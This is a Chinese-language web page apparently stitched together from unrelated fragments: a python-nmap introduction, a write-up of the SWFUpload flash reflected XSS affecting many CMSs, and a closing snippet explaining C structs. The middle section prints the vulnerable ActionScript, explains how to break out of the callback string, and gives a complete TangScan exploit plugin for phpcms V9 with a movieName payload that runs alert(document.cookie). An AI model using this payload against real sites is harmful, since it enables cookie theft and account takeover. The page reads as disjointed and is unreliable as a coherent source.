where are you
大家都比较熟悉nmap,nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端,并且推断计算机运行哪个操作系统(这是亦称 fingerprinting)。它是网络管理员必用的软件之一,以及用以评估网络系统安全。
今天分享一下python-nmap,是python的一个模块库,使用这个模块可以让python很方便的操作nmap扫描器来工作,它可以帮助管理员完成自动扫描任务和生成报告的工具,它还支持nmap的脚步输出。
python-nmap只提供了nmap中的端口扫描,但输出方式会让人便于信息整理。
前提:使用python-nmap你得先装有nmap该软件
Install from PIP
pip install python-nmap
最近看到WooYun-2014-69833报告中对swfupload.swf、uploadify.swf造成的flash xss 分析,由于涉及范围广(国内各大cms厂商,包括但不限于dedecms、phpcms、cmseasy、espcms、phpyun、thinksns、骑士人才系统、phpdisk、国微php168、phpok、kesioncms、pageadmin、xheditor、sdcms、emlog、dtcms等)命中率应该还可以,便给Tangscan提交了几个此类型插件,这里也分享一下代码。
先看下漏洞成因
this.movieName = root.loaderInfo.parameters.movieName;
this.flashReady_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].flashReady");
this.fileDialogStart_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].fileDialogStart");
this.fileQueued_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].fileQueued");
this.fileQueueError_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].fileQueueError");
this.fileDialogComplete_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].fileDialogComplete");
this.uploadStart_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].uploadStart");
this.uploadProgress_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].uploadProgress");
this.uploadError_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].uploadError");
this.uploadSuccess_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].uploadSuccess");
this.uploadComplete_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].uploadComplete");
this.debug_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].debug");
this.testExternalInterface_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].testExternalInterface");
this.cleanUp_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].cleanUp");
代码可见,从参数(root.loaderInfo.parameters.movieName)中获得movieName后直接赋值到一些callback响应函数中,这些函数是js中执行的内容。我们只需闭合前面的”],再闭合try..catch中大括号},即可执行自己的javascript代码,造成反射型XSS。
因为是flash xss,而且没有过多关键字,所以无视浏览器filter和大部分WAF(因为在前端运行),所以影响较大,轻则越权操作、产生XSS、csrf蠕虫,重则直接getshell(结合某些cms的后台getshell技巧)。
分享下phpcms V9 /swfupload.swf XSS POC
#! /usr/bin/env python
# -*- coding: utf-8 -*-
import md5
from thirdparty import requests
from modules.exploit import TSExploit
class TangScan(TSExploit):
def __init__(self):
super(self.__class__, self).__init__()
self.info = {
"name": "phpcms V9 /swfupload.swf XSS",
"product": "phpcmsv9",
"product_version": "",
"desc": """
phpcms V9 /swfupload.swf XSS
""",
"license": self.license.TS,
"author": ["侦探911"],
"ref": [
{self.ref.wooyun: "http://www.wooyun.org/bugs/wooyun-2014-069833"},
],
"type": self.type.xss,
"severity": self.severity.low,
"privileged": False,
"disclosure_date": "",
"create_date": ""
}
self.register_option({
"url": {
"default": "",
"required": True,
"choices": [],
"convert": self.convert.url_field,
"desc": ""
}
})
self.register_result({
"status": False,
"data": {
},
"description": "",
"error": ""
})
def md5(self, content):
return md5.new(content).hexdigest()
def verify(self):
flash_md5 = "3a1c6cc728dddc258091a601f28a9c12"
exp_url = "{domain}/statics/js/swfupload/swfupload.swf".format(domain=self.option.url.rstrip('/'))
try:
response = requests.get(exp_url, verify=False, timeout=15)
except Exception, e:
self.result.error = str(e)
return
if self.md5(response.content) == flash_md5:
self.result.status = True
self.result.description = "目标 {url} 存在反射XSS, 验证url: {verify_url}".format(
url=self.option.url,
verify_url=exp_url + "?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}//"
)
def exploit(self):
self.verify()
if __name__ == '__main__':
from modules.main import main
main(TangScan())
什么是结构体?为了便于引用数据,有时需要用不同的数据组合成一个有机的整体,而这样的整体中则是互相影响,相互联系。比如一个人的基本资料:编号,姓名,性别,地址(如下)。c语言中把这样自己指定的组合项称为结构体(structure)。
| num | name | sex | addr |
| 1 | Ruilin | M | Shanxi |